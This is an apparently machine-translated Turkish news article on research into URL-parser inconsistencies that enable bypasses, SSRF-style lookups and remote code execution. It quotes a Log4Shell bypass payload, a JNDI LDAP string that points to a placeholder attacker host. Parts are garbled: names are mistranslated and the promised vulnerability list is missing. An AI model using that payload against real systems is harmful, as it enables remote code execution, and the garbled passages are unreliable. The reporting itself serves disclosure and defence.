16 farklı Tekdüzen Kaynak Bulucu çalışması (URL) kitaplıkların ayrıştırılması, doğrulamaları atlamak ve çok çeşitli saldırı vektörlerine kapı açmak için kullanılabilecek tutarsızlıkları ve kafa karışıklıklarını ortaya çıkardı.
Siber güvenlik firmaları tarafından ortaklaşa yürütülen derin bir analizde klarnet ve Synk, C, JavaScript, PHP, Python ve Ruby dillerinde yazılmış ve çeşitli web uygulamaları tarafından kullanılan çok sayıda üçüncü taraf kitaplığında sekiz güvenlik açığı tespit edildi.
Araştırmacılar, “URL ayrıştırmadaki karışıklık, yazılımda (örneğin, web uygulaması) beklenmeyen davranışlara neden olabilir ve tehdit aktörleri tarafından hizmet reddi koşullarına, bilgi sızıntılarına veya muhtemelen uzaktan kod yürütme saldırılarına neden olmak için kullanılabilir.” The Hacker News ile paylaşılan bir raporda söyledi.
URL’ler, yerel olarak veya web üzerinde bulunan kaynakların istendiği ve alınabildiği temel bir mekanizma olduğundan, ayrıştırma kitaplıklarının bir URL isteğini nasıl yorumladığına ilişkin farklılıklar kullanıcılar için önemli riskler oluşturabilir.
Buna bir örnek, her yerde bulunan Log4j günlük kaydı çerçevesinde geçen ay açıklanan kritik Log4Shell kusurudur; bu, kötü niyetli bir saldırgan tarafından kontrol edilen dizenin, savunmasız bir uygulama tarafından günlüğe kaydedildiği zaman ve olarak değerlendirildiğinde, bir JNDI Düşman tarafından işletilen bir sunucuya bağlanan ve rastgele Java kodunu yürüten arama.
Apache Software Foundation (ASF) bu zayıflığı gidermek için hızlı bir şekilde bir düzeltme yapsa da, kısa süre sonra hafifletmelerin “$jndi:ldap://127.0.0 biçiminde özel olarak hazırlanmış bir girdi tarafından atlanabileceği ortaya çıktı.[.]1#.evilhost.com:1389/a”, bir kez daha uzaktan JNDI aramalarının kod yürütmesini gerçekleştirmesine izin verir.
“Bu atlama, JNDI arama işlemi içinde iki farklı (!) URL ayrıştırıcısının kullanılması gerçeğinden kaynaklanmaktadır, biri URL’yi doğrulamak için diğeri onu almak için ve her bir ayrıştırıcının Parça bölümünü (#) nasıl ele aldığına bağlı olarak. URL, Otorite de değişiyor” dedi araştırmacılar.
Özellikle, giriş normal bir HTTP URL’si olarak ele alınırsa, Yetki bileşen – etki alanı adı ve bağlantı noktası numarasının birleşimi – parça tanımlayıcıyla karşılaşıldığında sona erer, oysa bir LDAP URL’si olarak ele alındığında, ayrıştırıcı “127.0.0’ın tamamını atar.[.]1#.evilhost.com:1389”, LDP URL belirtimi parçayı hesaba katmadığından Yetkili olarak.
Gerçekten de, birden çok ayrıştırıcının kullanılması, sekiz güvenlik açığının keşfedilmesinin iki ana nedeninden biri olarak ortaya çıktı; diğeri, kitaplıkların farklı URL özelliklerini izlediğinde ortaya çıkan tutarsızlıklardan kaynaklanan sorunlardır ve etkin bir şekilde sömürülebilir bir boşluk yaratır.
Çelişki, ters eğik çizgi (“”) içeren URL’leri, düzensiz sayıda eğik çizgiyi (örneğin, https:///www.example) içeren karışıklığa kadar uzanır.[.]com) veya URL kodlanmış veri (“%”), uzaktan kod yürütme veya hatta aşamalı reddetme veya hizmet (DoS) ve açık yönlendirme kimlik avı saldırıları elde etmek için kullanılabilecek eksik URL şemasına sahip URL’lere.
Keşfedilen sekiz güvenlik açığının listesi aşağıdaki gibidir ve bunların tümü ilgili bakımcılar tarafından ele alınmıştır:
Araştırmacılar, “Birçok gerçek hayattaki saldırı senaryosu, farklı ayrıştırma ilkellerinden kaynaklanabilir” dedi. Uygulamaları URL ayrıştırma güvenlik açıklarından korumak için, “tüm sürece hangi ayrıştırıcıların dahil olduğunu tam olarak anlamak gerekir. [and] ayrıştırıcılar arasındaki farklar, hoşgörüleri olsun, farklı hatalı biçimlendirilmiş URL’leri nasıl yorumladıkları ve ne tür URL’leri destekledikleri.”
.
siber-2